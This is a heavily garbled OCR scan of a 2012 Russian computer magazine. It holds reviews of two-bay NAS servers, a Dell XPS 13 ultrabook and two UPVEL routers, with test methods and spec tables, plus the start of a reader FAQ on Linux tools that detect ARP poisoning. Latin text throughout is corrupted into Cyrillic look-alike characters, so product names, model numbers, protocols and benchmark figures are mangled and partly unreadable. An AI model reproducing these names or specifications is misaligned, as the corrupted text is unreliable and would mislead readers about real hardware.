Процессор: Іпіеі Соге І7-3960Х, 4 ГГц 
Кулер: ТНегтаІІаке Ргіо ОСК 
Материнская плата: Іпіеі 0X7931 
Память: Согзаіг Оотіпаіог СТХ7, 2 х 4 Гб 
Накопитель: Согзаіг Рогсе Р120, 120 Гб 
Жесткий диск: 2 х ѴѴезІегп йідііаі Ш1002РАЕХ, 
1000 Гб; 2 х ѴѴезІегп йідііаі ШЮЕАРХ, 1000 Гб 
Блок питания: ЕИЕРМАХ Ріаіітах, 750 Вт 
ОС: ѴѴіпсІоѵѵз 7 Максимальная 



быстро система справляется с зеркалирова- 
нием данных. 

Следом за скоростными показателями 
устройства оценивалась добротность прошив- 
ки: набор утилит и сервисов, время отклика 
веб-интерфейса и его интуитивность — все 
это очень важно при выборе готового ЫА5. 

На наш тестовый ПК, а также на все сетевые 
хранилища с сайтов производителя были 
установлены последние версии вспомогатель- 
ных программ и прошивок. 



132 



ХАКЕР 10/165/2012 



ЫА5 ЕРРЕСТ 



0-иЫК0Ы5-325 



Е авай познакомимся с самым недорогим двухди- 
сковым ИА5'ом в этом тесте (учитывая, что й-Ыпк 
ОЫ5-325 поставляется без «винтов»). Корпус на- 
шего «бюджетника» выполнен из толстенного алюминия. 
Крышка и задняя панель — из пластика. Собственно говоря, 
на «морде лица» й-Ыпк й N5-325 расположились лишь 
кнопка включения да цветовые индикаторы активности 115В 
и жестких дисков. Последний распаян на задней панели. 

Там же находится кнопка для резервного копирования. 

Для того чтобы установить винчестеры, необходимо снять 
переднюю крышку-панель и «загрузить» накопители по 
специальным направляющим, какхлеб втостер. РІикаких 
крепежей для «винтов» не предусмотрено. 

С вибрацией запоминающих устройств должны бороться 
две резиновые ножки, на которых стоит й-Ыпк ОЫ5-325. 

А справляться с охлаждением — один-единственный бес- 
шумный вентилятор, работающий на выдув. 

К сожалению, на сайте производителя нет ни одного 
слова о процессоре и памяти й-Ыпк ОЫ5-325. Поэтому нам 
пришлось самостоятельно разобрать устройство. В итоге из 
корпуса была демонтирована простенькая плата, на которой 
были распаяны процессор МагѵеІІ 88Р6-В1А2, чипы 50РАМ- 
памяти Ватзііпд общим объемом 256 Мб и ЫАМО-память 
Ватзііпд К9Р16081І0С-РСВО «весом» 128 Мб. Контроллеры 
5АТА подключены к плате посредством двух интерфейсов 
РСІ Ехргезз хі. 

Узнав стоимость й-Ыпк ОЫ5-325, как-то даже грешно 
винить его в недостаточной производительности. Для офиса 
подобный девайс вряд ли подойдет. А вот для дома, где 
требуется соединить один-два ПК, — очень даже! 





ЫЕТ6ЕАК 
Г )2000-200ЕІІ5 



еред нами небольшой полностью металлический 
черный «ящик». Ріа передней панели устрой- 
ства расположены основные органы управления, 
индикаторы, порт 115В 2.0 и отсеки для жестких дисков, 
спрятанные за металлической сетчатой дверцей. Для того 
чтобы установить РШй, необходимо нажать на своеобраз- 
ный спусковой рычаг и под звонкие щелчки достать рэки 
и закрепить запоминающие устройства. Хочется отметить 
продуманный и надежный корпус сервера. 

Ріа задней панели ИАВа расположен сетевой коннектор 
Р 3 -45, а также два порта 115В самой продвинутой, третьей 
ревизии. Да, ЫЕТ6ЕАР являются первопроходцами, которые 
внедряют прогрессивные интерфейсы. РІаличие 115В по- 
зволяеттебе воспользоваться услугами принт-сервера 
и сервера видеонаблюдения. 

При всем при этом за производительность ЫЕТ6ЕАР 
РМ02000-200ЕІІ5 отвечает процессор МагѵеІІ 6282, функ- 
ционирующий с частотой 1600 МГц, и оперативная память 
объемом 256 Мб. Конечно, данной платформе далеко до то- 
повых Іпіеі Аіот. Тем не менее производительности данного 
ЫА5-сервера хватит, чтобы удовлетворить запросы технома- 
ньяка в домашних условиях. 
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РЕККІІМ 




ОЫАР ТУРБО N А5 Т5-219Р II 



ервер (ЭИ АР ТигЬо ЫА5 Т5-219Р II может похвастать дюжей 
мощностью, за которую отвечает чип Агтасіа 300, функци- 
онирующий на частоте 2 ГГц. Новый «камень» МагѵеІІ так- 
же может порадовать поддержкой оперативной памяти стандарта 
ОйРЗ. В ОЫАР Т5-219Р II используется 512 Мб таких «мозгов». 

Все составляющие Т5-219Р II упакованы в компактном пласти- 
ковом корпусе. На передней панели устройства нашлось место 
кнопке включения, клавише активации функции резервного 
копирования, порту 115В, индикаторам активности системы, сети 
и накопителей, а также двум отсекам для жестких дисков. Един- 
ственная претензия у нас возникла как раз к пластиковым рэкам, 
к которым крепятся «харды». На наш взгляд, конструкция слишком 
хрупкая. И с вибрацией справляется не так хорошо, как металличе- 
ские аналоги. 

На задней панели устройства размещены: сетевой коннек- 
тор типа Р 3 -45, пара 115В и еще пара е5АТА. Там же находится 
70-миллиметровый вентилятор, абсолютно бесшумно работающий 
на выдув. 



ЫЕТ6ЕАР 

К№Р2000-100ЕІІ5 




есмотря на похожую маркировку и дизайн, разница между 
двумя моделями ІМЕТ6ЕАР существенна. В более продви- 
нутой модели используется I піеі Аіот 0525. «Мозги» сер- 
вера упакованы в планку памяти форм-фактора 50-йІММ, так что 
при желании всегда можно самостоятельно нарастить объем ОЗУ. 

В отличие от ІМЕТСЕАР РІ\Ю2000-200ЕІІ5, герой этих строк 
оснащен всего одним портом 115В 3.0, расположенным на передней 
панели. И еще парой ІІ5В-слотов предыдущего поколения, кото- 
рым на этот раз нашлось место сзади, аккурат под вентилятором 
(отметим, что «карлсон» работает весьма шумно). Также ІМЕТ6ЕАР 
РІѴЮ2000-100ЕІІ5 располагает сразу двумя Р 3 -45, что только 
добавляет девайсу вистов в плане функциональности. С учетом 
высокого уровня производительности, демонстрируемого храни- 
лищем, перед нами превосходное решение в первую очередь для 
офиса. Но и такие сервисы, как іТипез или ВіІТоггепІ, наверняка 
пригодятся дома. 




ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 





МЕТСЕАК ^N02000- 
200ЕІІ5 




МЕТ6ЕАК 

РЫйР2000- 

100ЕІІ5 



Процессор: 

Память: 

Интерфейсы: 

Уровни массивов: 
Поддерживаемые протоколы: 



Поддерживаемые сервисы: 



Комплектация: 



МагѵеІІ 88Р6-В1А2, 1,2 ГГц 
256 Мб, Затзипд К4Т16084СЮ-НСР7 
1 х РТ45 (10/100/1000 Мбит/с), 1 х 115В 
2.0 

РАЮ0, КАЮиВСЮ 
СІР5/5МВ, N55, АРР, ОНСР-клиент, 
00М5, ІЧТР, РТР через 55І_/ТІ_5, РХР, 
НТТР/НТТР5, 1_І_Т0, ІІРпР, Вопіоиг, 
ѴѴеЬйАѴ 

медиасервер, принт-сервер, 

Тіте МасЫпе, ВіПЪггепІ 

без НОй 



МагѵеІІ 6282, 1,6 ГГц 
256 Мб 

1 хР.І-45 (10/100/1000 Мбит/с), 1 ХІІ5В 2.0,2 х 
115В 3.0 

РАЮ0, РАЮ1, Х-РАЮ2ЩВСЮ 

5МВ/СІР5, НТТР/НТТР5, РТРДРТР, N55, АРР, 

Вопіоиг, ІІРпР 



медиасервер, принт-сервер, ВіГГоггеЫ, 
Тіте МасЫпе 

без НОй (существуют модели с 1 и 2 Тб) 



Іпіеі Аіот 0525, 1,8 ГГц 
1024 Мб 

2 х Р-І-45 (10/100/1000 Мбит/с), 1 х 115В 3.0, 2 х 
115В 2.0 

РАЮ0, РАЮ1, Х-РАІ02 

5МВ/СІР5, НТТР/НТТР5, РТРДРТР, N55, АРР, 
І5С5І, Вопіоиг, ІІРпР, Теіпеі, 55Н, І5С51, 5NМР 



медиасервер, принт-сервер, сервер 
видеонаблюдения, ІТипез, ВіГГоггеЫ, 
чТіте МасЫпе 

без НОй (существуют модели с 2 и 4 Тб) 
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ІЧА5 ЕРРЕСТ 



ОЫАР ТОРВО ЫА5 Т5-259 РКО+ 



ризнаемся, СПМАР ТигЬо 1\1А5 Т5-259 Рго+ выглядит несколько при- 
вычней. Перед нами устройство, собранное в классическом для 
серверов этой компании металлическом корпусе. Ріа передней 
панели расположены все те же кнопки, индикаторы и порт 115В. Разве что 
отсеки для жестких дисков теперь оснащены замками. Ключи, естественно, 
идут в комплекте. Ріа задней панели достаточно кучно расположились по два 
ВЗ-45 и е5АТА, а также сразу четыре порта 115В 2.0. Есть и вход Ѵ6А, предна- 
значенный в основном для обеспечения консольного доступа. 

Сетевое хранилище может быть сервером печати, РТР-сервером, серве- 
ром видеонаблюдения, веб-сервером и системой резервирования данных 
для ѴѴі псіоѵѵз-. Мае- и Ыпих-систем. Так, СПМАР Т5-259 Рго+ поддерживает 
до трех принтеров, до 256 одновременных РТР-подключений и до четырех 
ІР-камер для мониторинга помещений, записи и воспроизведения видео- 
контента. 

Ріо если использовать СИМ АР Т5-259 Рго+ в домашних условиях, то опреде- 
ленно по вкусу придутся сервисы ІІРпР, РЫМА, іТипез и ВіГГоггепР 
За производительность системы можно не беспокоиться: СІІМАР Т5-259 Рго+ 
оснащен довольно мощным х86-процессором вкупе с гигабайтом памяти 
стандарта ООР2. РІаш тест это отчетливо продемонстрировал. Ріа м лишь 
остается констатировать тот факт, что ОЫАР Т5-259 Рго+ удостаивается на- 
грады редакции, как самый совершенный двухдисковый ІМА5. 





ТНЕСІІ5 Ы2200ХХХ 




етевой накопитель ТЬесиз ІМ2200ХХХ привычно выполнен в черном 
цвете. Конструкция корпуса ІМА5-сервера состоит целиком из ме- 
талла, но с пластиковой лицевой панелью. Ріа ней разместились 
ІІ5В-порт и «щель» кардридера: оба слота применяются для резервного 
копирования файлов. РІаверняка подобный арсенал привлечет внимание 
фотографов. 

Сверху находятся достаточно простенькие индикаторы активности РШй/ 
115В и типа соединения І.АІМ/ѴѴАІМ. Ріа задней панели есть еще пара 115В, 
а также е5АТА и два гигабитных ЕіЬегпеІ-соединения. Естественно, ТЬесиз 
ІМ2200ХХХ поддерживает функции принт-сервера и сервера видеонаблю- 
дения (до пяти ІР-камер). Поэтому данное количество интерфейсов вполне 
обоснованно. 

Сервер поддерживает дисковые форматы РАЮО, РАЮ1 и простое слияние 
МВСЮ. Естественно, с возможностью «горячей» замены дисков. 

За охлаждение винчестеров отвечает единственный вентилятор, рабо- 
тающий на выдув. Признаемся, «карлсон» мог бы работать и потише. 





ТНесиз 

Ы2200ХХХ 



МагѵеІІ КігкѵѵоосІ, 2 ГГц 
512 Мб, ОйРЗ 

1 х Р.І-45 (10/100/1000 Мбит/с), 3 х 115В 2.0, 

2 х е5АТА 

РАЮ0,РАЮиВСЮ 

СІР5/5МВ, АРР, ЫР5, РТР, НИР, НТТР5, 
Теіпеі, 55Н, І5С5І, 5ИМР, ЦРпР, Вопіоиг, 
ОЦМ, ѴѴеЬйАѴ 



Іпіеі Аіот 0525, 1,8 ГГц 
1024 Мб, йОР2 

2 х Р-І-45 (10/100/1000 Мбит/с), 5 х 115В 
2.0, 2 х еЗАТА, 1 хѴ6А 
РАЮО,РАЮиВОО 

СІР5/5МВ, АРР, ЫР5, РТР, НИР, НТТР5, 
Теіпеі, 55Н, І5С51, 5ЫМР, ІІРпР, Вопіоиг, 
01_МА, ѴѴеЬйАѴ 



Іпіеі Аіот 0525, 1,8 ГГц 
1024 Мб, йОРЗ 

2 х РЦ-45 (10/100/1000 Мбит/с), 

3 х 115В 2.0, 50/50НС/ММС, 1 х е5АТА 
РАЮО, РАЮиВОй 

5МВ/СІР5, НИР/НИР5, РТР, ТРТР, 
ИР5, АРР, І5С5І, Вопіоиг, ІІРпР 



медиасервер, принт-сервер, сервер видео- 
наблюдения, медиапортал, веб-сервер, 
сервер ІТипез, ВіГГоггеЫ, Тіте МасЫпе 
без НОй 



медиасервер, принт-сервер, сервер виде- 
онаблюдения, медиапортал, веб-сервер, 
сервер ІТипез, ВіГГоггеЫ, Тіте МасЫпе 
без НОй 



ІТипез, фотосервер, медиасервер, 
принт-сервер, сервер видео- 
наблюдения, почтовый сервер 
без НОй 



ИТОГИ ТЕСТИРОВАНИЯ 

Как и ожидалось, АРМ-решения оказались 
медленнее, но зато тише и доступнее — пользо- 
вателям с небольшими запросами и маленьким 
бюджетом рекомендуем обратить внимание на 
них. ІМЕТ6ЕАР ПІ\Ю2000-200ЕІІ5 мы присуждаем 
награду «Лучшая покупка». 

Остались гиганты на базе топовых процессо- 
ров МагѵеІІ и Іпіеі Аіот. За самую высокую про- 
изводительность и богатый функционал главный 
приз сегодняшнего теста — награда «Выбор ре- 
дакции» — СПМАР ТигЬо ІМА5 Т5-259 Рго+. Тем же, 
кто хочет заполучить себе сервер на базе Аіот 
подешевле, советуем познакомиться поближе 
с устройством от ТЬесиз. Модель ІМ2200ХХХ, удо- 
стаивается награды «Лучшая покупка», □с 
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РЕЗУЛЬТАТЫ ТЕСТОВ 



ШТЕІ. ЫА5РТ (КАЮ II, МБАЙТ/С 



РЬоІо АІЬипп 
0\г Сору {гот ЫА5 
0\г Сору {о ЫА5 
Рііе Сору {гот ЫА5 
Рііе Сору Іо ЫА5 
0{{ісе РгосІисЬѵіІу 
Соп{еп{ Сгеаііоп 
РЮ РІауЬаск & РесогсІ 
РЮ Ѵісіео РесогсІ 
4х РЮ РІауЬаск 
2х РЮ РІауЬаск 
РЮ Ѵісіео РІауЬаск 




Результаты тестирования серверов в режиме РАШ 1 
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ШТЕІ. ЫА5РТ (КАЮ 01, МБАЙТ/С 



РЬоІо АІЬипп 
0\г Сору {гот ЫА5 
йіг Сору Іо ЫА5 
Рііе Сору {гот ЫА5 
Рііе Сору {о ЫА5 
0{{ісе РгосІис{іѵі{у 
Соп{еп{ Сгеаііоп 
РЮ РІауЬаск & РесогсІ 
РЮ Ѵісіео РесогсІ 
4х РЮ РІауЬаск 
2х РЮ РІауЬаск 
РЮ Ѵісіео РІауЬаск 





ТЬесиз Ы2200ХХХ 
ОЫАР ТигЬо N35 ТБ-259 Рго-н 
ОЫАР ТигЬо N35 Т5-219 Р II 
NЕТ6ЕАР РМБ2000-200ЕІІ5 
NЕТ6ЕАР РN^2000-100Е^5 
0-Ыпк0№-325 
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Результаты тестирования серверов в режиме РАШ 0 



РЕККІІМ 



Николай Арсеньев 




И еІІ в представлении не нуждается, а вот об опыте общения с уль- 
трабуком ХР5 13 мы поведаем с большим удовольствием. Модель 
относится к премиум-сегменту, о чем свидетельствует ее ценник. 
Качество сборки и материалов впечатляют: верхняя крышка покрыта 
алюминием, для нижней части использовали углеродистое волокно, по- 
верхность около клавиатуры сделана из магниевого сплава с нанесением 
софт-тач. Стройные линии, закругленные углы, приглушенная цветовая 
гамма радуют глаз. 

Открываем крышку ноутбука, жмем кнопку включения и... ощущение, 
что ничего не происходит. Индикаторов нет, точнее, есть один в виде 
полоски с белой подсветкой на торце, но на нее не сразу обращаешь 
внимание. И это хорошо: ничто не отвлекает от процесса. Кактолько ноут 
просыпается, включается и не менее белая подсветка клавиатуры. Тип 
островной, клавиши расположены недалеко друг от друга. Все символы 
хорошо читаются и, конечно же, подсвечены. Есть стрелки, длинные 
БЫЙ'ы, клавиши ѴѴіпсІоѵѵз и Рп. Последняя предоставляет доступ к рас- 
ширенным функциям кнопок, среди них отметим возможность регули- 
ровки подсветки (два уровня + отключение оной), на стрелки перенесли 
функции Рд ІІр/ Рд йп и Ноте/ЕпсІ. Время привыкания небольшое, 
печатать удобно и комфортно. Клавиши слегка утоплены в центре, кроме 
стрелок вверх и вниз — они, наоборот, выпуклые. Тачпад большой и 
сплошной, покрытие тактильно очень приятное. Есть одно нарекание: 
когда одним пальцем перемещаем курсор, не стоит шевелить пальцами, 
находящимися на функциональных областях, иначе курсор встанет как 
вкопанный и придется убрать все конечности, чтобы продолжить путе- 
шествие. Поверхность вокруг клавиатуры и тачпада хоть и матовая, но 
отпечатки оставляет заметные. 

Среди разъемов есть по одному 115В 3.0 и 115В 2.0, тіпі-ЕЮМІ и со- 
вмещенный аудиоразъем. Куда больше для мобильного использования? 
Если понадобятся дополнительные порты, воспользуемся ІІ5В-хабом. 

А вот «читалки» 50-карт не хватает. 

Разрешение экрана для 13,3 дюймов оптимальное (1366 х 768), но 
картину портит бликующее покрытие, а также невысокая контрастность 
матрицы. Это своеобразная расплата за использование закаленной 
стеклянной панели СогіІІа. К тому же рамки дисплея настолько тонкие, 
что 13,3-дюймовый лэптоп практически догоняет по «антропометриче- 
ским» характеристикам 11-дюймовые ультрабуки. Производительность 
ХР5 13 радует, и не в последнюю очередь благодаря 550-накопителю. 
Полное включение ѴѴіпсІоѵѵз 7 происходитза секунды. Функция РазіАссезз 
Расе РесодпШоп позволит ограничить доступ к ноутбуку, используя свой 
автопортрет, сделанный на камеру, и установив пароль. РІепонятно зачем, 
ведь злоумышленник может взять фотографию пользователя, и дело будет 




РСМагк 7, бе^аиИ: 3591 балл 
РСМагк Ѵапіаде, йе^аиИ: 9992 балла 
ЗйМагк Ѵапіаде, Епігу, 1280 х 720, 
6РЦ/СРЦ: 1859/6543 балла 
ЗйМагк'ОЗ, йе^аиіі: 10 277 баллов 
Неаѵеп Огадоп, 6X1 0, по АР, по АА, 
1366x768: 246 баллов 
Бирег Рі 1.5X5, 1т: 13,218 с 
ѵѵРгіте 1.55, 32т: 24,638 с 
ѴѴіпКАК 4.20: 2895 Кб/с 
Резісіепі ЕѵіІ 5, 6X9, Махітит, по АР, 
поАА, 1366x768: 19,1 ГР5 
І_озІ РІапеІ 2, Туре В, йХ9, Махітит, 
по АР, по АА, 1280x720: 10,5 ГР5 
ВаНегу Еаіег Рго : 2 ч 09 мин 

□ достойная производительность 
и время работы 

□ отличное качество сборки 
и материалов 

□ удобная клавиатура с регулируемой 
подсветкой 

в сильный нагрев и уровень шума 
под нагрузкой 
в бликующее покрытие 
в высокая стоимость 



ш 


таг 




Ш 



Дисплей: ТЫ + Рііт, 13,3", 1366 х 768 точек 
Процессор: Іпіеі Соге І5-2467М, 1,6 ГГц 
Чипсет: Іпіеі 0567 

Оперативная память: йОРЗ 1333 МГц, 4 Гб 
Видеокарта: Іпіеі РШ ОгарЫсз 3000 
Жесткий накопитель: Затзипд РМ830 
256 Гб, 550, т5АТА 

Сеть: ѴѴі-Рі (802.11 а/Ь/д/п), ВІиеІооШ 3.0 

Аудио: РеаІІек АІ.С275 

Разъемы: 115В 3.0, 115В 2.0, тіпі-ОіврІау- 

Рогі, комбинированный аудиовход/выход 

Размеры: 316 х 205 х 18 мм 

Масса: 1,36 кг 

ОС: ѴѴіпсІоѵѵз 7 Домашняя 

Расширенная 64 бит 

Дополнительно: акустика 2x1,5 Вт, 

веб-камера (1,3 мегапикселя), 

2 х микрофона, ѴѴЮі, кнопка 
для проверки заряда батарей 



только за паролем... В арсенале есть еще с десяток предустановленных 
программ, отдельные из которых вполне пригодны для жизни. 

Под серьезной нагрузкой ХР5 13 сильно греется, главным образом 
центр, ближе к тыльной части. Чтобы остудить начинку, включается 
активное охлаждение, и если при легком использовании едва ли за- 
метишь шум, то при включении ресурсоемких приложений ты его точно 
услышишь! В оправдание стоит сказать, что обозреваемый гаджет 
на подобное изначально и не рассчитывался. Емкости аккумулятора 
на серфинг в Сети, проверку почты и прочих социальных развлечений 
с включенным ѴѴі-Рі хватает на пять с лишним часов, если не выкручи- 
вать яркость экрана на максимум. 



выводы 



ОеІІ ХР5 13 ладно сложен, симпатичен и весит немного. Но в то же время 
пользователю придется смириться всего с двумя ІІ5В-портами, а также 
отсутствием 50-кардридера. Кому-то может не приглянуться и бликую- 
щее покрытие ультрабука. Но в остальном нам элементарно не к чему 
придраться! Ш-И 
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РЕККУМ 



Даниил Либарц 




ируЕИЛ^огизо 



ирѵЕіик-325вы 



Интерфейсы: 


1 х ѴѴАІМ (Р-І-45) 10/100 
Мбит/с, 1 х І_АІ\І (Р-І-45) 
10/100 Мбит/с 


1 х ѴѴАИ (РЗ-45) 10/100 
Мбит/с, 4 х І_АМ (Р-І-45) 
10/100 Мбит/с 


Беспроводная точка 
доступа ѴѴі-Рі: 


ІЕЕЕ 802.1 1 Ь/д/п 


ІЕЕЕ 802.1 1 Ь/д/п 


Частотный диапазон: 


2,4 ГГц 


2,4 ГГц 


Безопасность: 


ѴѴЕР, ѴѴРА/ѴѴРА-Р5К, 
ѴѴРА2/ѴѴРА2-РБК 
(ТКІР, АЕ5) 


ѴѴЕР, ѴѴРА/ѴѴРА- РБК, 
ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР, АЕ5) 


Функции роутера: 


ИАТ, ОупОИБ, Біаііс 
РоіЛіпд, йНСР, ОоБ 


ІМАТ, ОупОИБ, Біаііс 
РоиНпц, йНСР, ОоБ 


Поддержка соединений: 


РРРоЕ, РРТР, І_2ТР, 
Біаііс/Оупатіс ІР 


РРРоЕ, РРТР, І_2ТР, 
Біаііс/Оупатіс ІР 


Дополнительно: 


ѴѴР5,ІІРпР, 115В порт 
для подключения 
33/43-модемов 


ѴѴР5, ІІРпР 



ЕДШЕИШЭ 

ПК 

Процессор: Іпіеі Соге 2 йио 
Е6850, 4 ГГц 

Системная плата: А51І5 Р5СІС 
Оперативная память: 2 х 2 Гб, 

Бііісоп Роѵѵег, ОйРЗ 
Видеокарта: ІМѴЮІА ЗеРогсе 
9800 ЗТ 

Блок питания: 430 Вт, 

ТНегтаІІаке 
Операционная система: 

МІсгозоН ѴѴіпсІоѵѵз 7 
Шітаіе х64 

СЕРВЕР 

Процессор: Іпіеі Сеіегоп 
ОиаГСоге 3530 

Системная плата: Н67М5-Е23 
Оперативная память: 2 х 2 Гб, 

Кіпдзіоп, ОйРЗ 

Блок питания: 400 Вт, Р5Р 
Операционная система: 

МісгозоН ѴѴіпсІоѵѵз Бегѵег 
2008 Р2 ЗіапсІагсІ х64 



РРТР: 81 Мбит/с 
ѴѴі-Рі: 90 Мбит/с 
МАТ: 95 Мбит/с 







ШЖ: 


до 
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І_еѵеІ ІІр! 



Если раньше выход во Всемирную сеть имел единственный в доме ПК, то сегодня доступ к глобальной 
паутине нужен чуть ли не кофеварке. Интернет стал необходим не только дома, но и в поездках. 

Мы постараемся помочь тебе организовать выход в Сеть, рассказав о двух роутерах компании ІІРѴЕІ.. 



ДОМОХОЗЯИН 



Начнем обзор с домашнего роутера ІІРѴЕІ ІІР- 
325ВІМ. Устройство поставляется в картонной 
коробке средних размеров. На упаковке, как 
и полагается, присутствуют информативные 
картинки с возможностями устройства. Вну- 
три коробки можно обнаружить сам роутер, 
адаптер питания, патчкорд, инструкцию и 
диск с ПО. Набор стандартен для устройств 
этого класса. 

ІІРѴЕІ ІІР-325ВІМ имеет небольшие раз- 
меры и без проблем разместится даже на 
маленьком столе. Роутер имеет две антенны, 
один портѴѴАІМ и четыре І_АІМ-порта. На зад- 
ней стенке также разместились выключатель 
и кнопка ѴѴР5. 

Набрав в браузере ІР-адрес роутера (по 
умолчанию 192.168.10.1) и введя заветную пару 
абтіп/асітіп, мы попадем в веб-интерфейс 
устройства. Слева располагаются пункты 
меню, а справа — соответствующая настрой- 
ка той или иной функции. Радует, что сразу 
после подключения не выскакивает мастер 
быстрой настройки — программисты нена- 
вязчиво отправили его в отдельный пункт. 
Вообще, мастер и не потребуется (ведь ты же 
техноманьяк!), потому что поиск и доступ к 
любой настройке происходит не более чем в 
два клика. 

Для выхода во Всемирную сеть ІІРѴЕІ ІІР- 
325В N имеет в своем арсенале несколько ти- 
пов подключений, а именно: Біаііс ІР, Оупатіс 
ІР, І_2ТР, РРТР и РРРоЕ. Данного джентльмен- 
ского набора вполне достаточно для выхода в 
интернет через любого ЕіЬегпеІ-провайдера. 

В роутере реализована фильтрация по ІР, МАС 
и ІІРІ_. Данная функция будет полезна, если 
в интернет выходят дети: родители запросто 
могут оградить свое чадо от сомнительных 
ресурсов аж на уровне роутера, разом закрыв 
туда доступ и с компьютера, и с ноутбуков, 
и со смартфонов. Функция проброса портов 
будет нужна, если дома установлен игровой 
или файловый сервер. Благодаря поддержке 
сервера динамических 0І\І5 можно не оза- 
дачиваться постоянным ІР-адресом. Стоит 
отметить поддержку «демилитаризованной 
зоны» ШМ2). С помощью этой функции можно 
открыть доступ к конкретному компьютеру 
через интернет, например при желании соз- 
дать веб-сервер. 

Организация ѴѴі-Рі занимает немного 
времени. ІІРѴЕІ ЬІ Р-325 В N поддерживает 
стандарты 802.1 1 Ь/д/п с шифрованием ѴѴЕР 
или ѴѴРА/ѴѴРА2. Стоит отметить, что роутер 
может работать в режиме повторителя ѴѴі-Рі. 

В целом с настройкой ІІРѴЕІ ІІР-325ВІМ не 
было проблем. После изменения настроек 



роутер перезагружался не более минуты, 
включение также происходило быстро. При 
условии невысокой цены ІІРѴЕІ ЬІ Р-325 В N 
можно рекомендовать большинству поль- 
зователей для домашнего применения. За- 
ложенного функционала должно хватить для 
большинства задач. 



Я ВСЕГДА С СОБОЙ БЕРУ 



Мобильные роутеры сейчас кажутся не 
диковинкой, а необходимостью, особенно 
если на отдыхе в отеле торчит один кабель, а 
интернет нужен по ѴѴі-Рі и сразу нескольким 
устройствам. ІІРѴЕІ ІІР-702ІМ36 как раз может 
стать универсальным помощником в путе- 
шествиях. Поставляется роутер в небольшой 
коробке, оформленной в фирменном стиле, 
то бишь с сочетанием белого и оранжевого 
цветов. В комплекте с ІІРѴЕІ СІР-702ІМ36 идет 
инструкция, ІІ5В-кабель, патчкорд, диск с ПО 
и адаптер питания. Устройство имеет размеры 
немногим меньше двух пачек сигарет, что, не- 
сомненно, хорошо, ведь он не займет в твоей 
сумке много места. ІІРѴЕІ. И Р-702 N33 может 
подключаться к интернету через ЕіЬегпеІ- 
порт, 30/40-модем или ѴѴі-Рі. Ріа сегодняш- 
ний день поддерживаются все известные 
операторы связи и множество модемов. 
Производитель заявляет, что постоянно ве- 
дется работа по добавлению совместимости с 
новыми модемами. Сфера применения ІІРѴЕІ 
ЦІ Р-702 N30 настолько разнообразна, что во 
многом зависит оттвоей фантазии. РІапример, 
во время самой поездки в поезде или автомо- 
биле к устройству можно подключить модем. 
По приезду на место роутер можно подцепить 
к ЕіЬегпеІ-порту и сконфигурировать его по 
ѴѴАІМ-интерфейсу, соответственно, на выходе 
получить интернет по беспроводной сети. 

Несмотря на то что ІІРѴЕІ ІІР-7О2ІМ30 
имеет небольшие размеры, в нем заключен 
«взрослый» функционал. ЕіЬегпеІ-порт имеет 
два режима работы: ѴѴАІМ и І_АІ\І. В первом 
случае можно организовать доступ в интернет 
через Біаііс ІР, бупатіс ІР, І.2ТР, РРТР или 
РРРоЕ. В режиме І_АІ\І возможности такие 
же, как и у стационарной модели. Остальной 
функционал очень схож с функциями ІІРѴЕІ. 
ІІР-325ВЫ. Портативное устройство под- 
держивает фильтрацию, проброс портов, 
йМ2-зону и сервер ОупОІМБ. Это далеко не все, 
но уже говорит о том, что ІІРѴЕІ СІР-702ІМ36 
является полноценным роутером, только с 
«урезанными» ЕіЬегпеІ-портами. 



МЕТОДИКА ТЕСТИРОВАНИЯ 



Роутеры могут иметь красивый внешний вид, 
удобное управление и богатый функционал, 



однако все эти достоинства меркнут, если 
скоростные характеристики не соответству- 
ют должному уровню. Для тестирования нам 
понадобится ПК с поднятым РРТР-сервером 
и клиентские ПК. Условно тест можно раз- 
делить на три части, каждая с определенной 
схемой подключения. 

• Тестирование ІЧАТ. Для этого теста необхо- 
димо подключить роутер к серверу через 
ѴѴАЫ-порт, настроив подключение через 
статический ІР. К І_АІМ-порту подключается 
клиент. Пропуская трафик между сервером 
и клиентом, мы получим скорость в режиме 
трансляции сетевыхадресов. 

• Тестирование РРТР. В данном случае на 
роутере надо настроить подключение 
через протокол РРТР. Стоитотметить, 
что провода подключены аналогично 
предыдущей схеме. Послеустановки связи 
сервер вы даст маршрутизатору ІР-адрес 
иззаданного пула. Послеэтого измеряется 
скорость между сервером внутри туннеля и 
клиентским ПК. 

• Тестирование ѴѴі-Рі. Этот тест заключается 
в измерении скорости между клиентами. 
Один клиентподключается к І_АІ\І-порту ро- 
утера, а второй, соответственно, через бес- 
проводное соединение. Для безопасности 
мы использовали ѴѴРА2-Р5К- шифрование. 

Все тесты проводились с помощью ком- 
плекса от компании Іхіа. Комплекс состоит из 
консоли управления и конечных точек, которые 
устанавливаются на все ПК, участвующие в те- 
сте. В консоли указываются ІР-адреса, между 
которыми будет «гоняться» трафик, а также 
метод его передачи. Для нашего теста мы ис- 
пользовали предустановленный скрипт ЫдЬ 
регіюгппапсе іЬгоидЬриІ, который генерировал 
данные для передачи. Для каждого подтеста 
трафик гонялся от клиента к серверу (ир), от 
сервера к клиенту (боѵѵп) и одновременно в 
двух направлениях ({бх). Стоит отметить, что 
для теста ѴѴі-Рі использовался фирменный 
адаптер ІІРѴЕІ ІІА-222ѴѴІМІІ (550 рублей). 



выводы 



Если ты не можешь жить без интернета и про- 
веряешь почту после каждого взгляда на часы, 
то мы можем рекомендовать рассмотренные 
устройства к приобретению. Полноценная 
модель ІІРѴЕІ СІР-325ВІМ позволит без про- 
блем выходить в интернет дома, а портативная 
версия ІІРѴЕІ ІІР-702ІМ36 не будет занимать 
много места в кармане во время всевозможных 
путешествий. Конечно же, очень важным до- 
стоинством сетевых устройств ІІРѴЕІ является 
и их весьма доступная цена. ПС 
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РАО 



Глеб Чербов (сНегЬоНйдтаіІ.сот) 




ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аКЕАІ..ХАКЕР.ІШ 



В одном из прошлых номеров для 
защиты отатактипа АРР-роізопіпд 
предлагалось использовать программу 
АВРРгееіе. А есть ли аналоги для І_іпих? 

Конечно же, существует масса подобно- 
го софта и для І_іпих — от совсем 
незамысловатых скриптов, приглядывающих 
за АНР-таблицей, до самых настоящих систем 
предотвращения вторжений. Из общей массы 
по соотношению «простота / интересные 
возможности» выделяется демон по имени 
еіЬегѵѵаІІ ( Ьіі.Іѵ/еібегѵѵаІІ ). Сразу после старта 
происходит очистка АРР-кеша, детектирова- 
ние шлюза и создание статической записи 
в таблице, после чего сетевой интерфейс 
переводится в прослушивающий режим для 
реагирования в режиме реального времени. 
